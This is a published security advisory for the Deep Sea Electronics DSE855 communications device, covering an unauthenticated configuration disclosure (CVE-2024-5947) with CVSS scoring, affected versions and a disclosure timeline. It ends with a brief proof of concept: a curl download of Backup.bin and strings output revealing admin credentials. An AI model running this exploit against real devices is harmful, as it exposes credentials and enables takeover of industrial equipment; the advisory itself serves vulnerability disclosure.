Lucene search

Gjoko KrsticZSL-2024-5825

HistoryJul 03, 2024 - 12:00 a.m.

Deep Sea Electronics DSE855 Remote Authentication Bypass

2024-07-0300:00:00

Gjoko Krstic

zeroscience.mk

100

dse855

remote authentication bypass

privilege escalation

system access

dos

exposure of system information

exposure of sensitive information

configuration disclosure

http request

zero day initiative

vulnerability

CVSS3

6.5

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

6.8

Confidence

High

EPSS

0.001

Percentile

29.8%

JSON

Title: Deep Sea Electronics DSE855 Remote Authentication Bypass
Advisory ID: ZSL-2024-5825
Type: Local/Remote
Impact: Security Bypass, Privilege Escalation, System Access, DoS, Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data
Risk: (5/5)
Release Date: 03.07.2024

Summary

The DSE855 communications device allows monitoring of a single DSE controller with USB connectivity over a LAN or WAN connection. To achieve this the DSE855 utilises its in-built web server or MODBUS TCP. In order to use over a LAN connection the on-site router must be configured to be accessible from any global location.

Description

The device is vulnerable to configuration disclosure when direct object reference is made to the Backup.bin file using an HTTP GET request. This will enable an attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.

Vendor

Deep Sea Electronics plc - <https://www.deepseaelectronics.com>

Affected Version

Model: DSE855
Software version: 1.0.26
Module version: 1.0.78
Bootloader version: 1.0.3
Firmware version: 1.1.0

Tested On

embOS/IP

Vendor Status

[10.11.2023] Vulnerability discovered.
[14.11.2023] Vendor communicated via Trend Micro’s Zero Day Initiative program.
[13.06.2024] ZDI-24-671 advisory released.
[03.07.2024] Public security advisory released.
[18.09.2024] Vendor releases updated firmware to address this issue.

PoC

dse855_auth.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zerodayinitiative.com/advisories/ZDI-24-671/>
[2] <https://vulners.com/cve/CVE-2024-5947>
[3] <https://nvd.nist.gov/vuln/detail/CVE-2024-5947>
[4] <https://packetstormsecurity.com/files/179342/>
[5] <https://pentest-tools.com/vulnerabilities-exploits/deep-sea-electronics-dse855-authentication-bypass_22935>
[6] <https://www.zerodayinitiative.com/blog/2024/7/25/multiple-vulnerabilities-in-the-deep-sea-electronics-dse855>
[7] <https://www.deepseaelectronics.com/genset/remote-communications-overview-displays/dse855/software>

Changelog

[03.07.2024] - Initial release
[26.07.2024] - Added reference [4], [5] and [6]
[18.09.2024] - Added vendor status and reference [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>Deep Sea Electronics DSE855 Remote Authentication Bypass


Vendor: Deep Sea Electronics plc
Product web page: https://www.deepseaelectronics.com
Affected version: Model: DSE855
                  Software version: 1.0.26
                  Module version: 1.0.78
                  Bootloader version: 1.0.3
                  Firmware version: 1.1.0

Summary: The DSE855 communications device allows monitoring of a single
DSE controller with USB connectivity over a LAN or WAN connection. To achieve
this the DSE855 utilises its in-built web server or MODBUS TCP. In order
to use over a LAN connection the on-site router must be configured to be
accessible from any global location.

Desc: The device is vulnerable to configuration disclosure when direct object
reference is made to the Backup.bin file using an HTTP GET request. This will
enable an attacker to disclose sensitive information and help her in authentication
bypass, privilege escalation and full system access.

Tested on: embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5825
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5825.php
ZDI ID: ZDI-24-671
ZDI CAN: ZDI-CAN-22679
ZDI URL: https://www.zerodayinitiative.com/advisories/ZDI-24-671/
ZDI Title: (0Day) Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability
CVE ID: CVE-2024-5947
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-5947


10.11.2023

--


$ curl -s -O http://target/Backup.bin
$ strings Backup.bin

DSEB
Admin
Password1234
Tech
Password1234
thricer
scada
rd1234
lokna
xela123
DSE855
</p></body></html>